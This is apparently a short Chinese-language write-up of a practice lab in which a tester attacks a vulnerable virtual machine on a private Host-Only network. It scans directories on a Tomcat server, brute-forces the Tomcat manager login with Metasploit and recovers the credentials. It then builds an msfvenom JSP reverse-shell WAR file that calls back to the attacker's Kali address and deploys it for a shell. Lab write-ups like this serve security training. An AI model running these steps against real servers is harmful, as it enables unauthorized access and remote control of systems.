第0步：网卡配置

                靶机端：将下载好的靶机环境，导入 VritualBox，设置为 Host-Only 模式

                Kali端：将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only

       第一步：确定靶机IP

#靶机IP
192.168.56.101#KaliIP
192.168.56.102

        第二步：扫描后台及开放端口

        第三步：添加端口8080进行敏感目录及文件扫描

+ http://192.168.56.101:8080/docs (CODE:302|SIZE:0)                               
+ http://192.168.56.101:8080/examples (CODE:302|SIZE:0)                      
+ http://192.168.56.101:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://192.168.56.101:8080/host-manager (CODE:302|SIZE:0) 
+ http://192.168.56.101:8080/manager (CODE:302|SIZE:0) 
+ http://192.168.56.101:8080/shell (CODE:302|SIZE:0)             

        第四步：访问8080端口，发现是个tomcat页面，并发现登录窗口

        第五步： 使用msf爆破一下

#更换镜像源
sudo nano /etc/apt/sources.list
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#安装msf
sudo apt install metasploit-framework#启动msf
sudo msfconsole#爆破tomcat
search tomcat login
use 0
show options
set rhosts 192.168.56.101
run#用户名密码
tomcat：role1

        第六步：登录

        第七步：发现有可以上传war包的位置，准备反弹shell

#命令
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.102 LPORT=6666 -f war -o revshell.war

        第八步：在Kali开启监听

        第九步：部署war包并点击访问，成功反弹shell

                                                                                                                        FROM  IYU_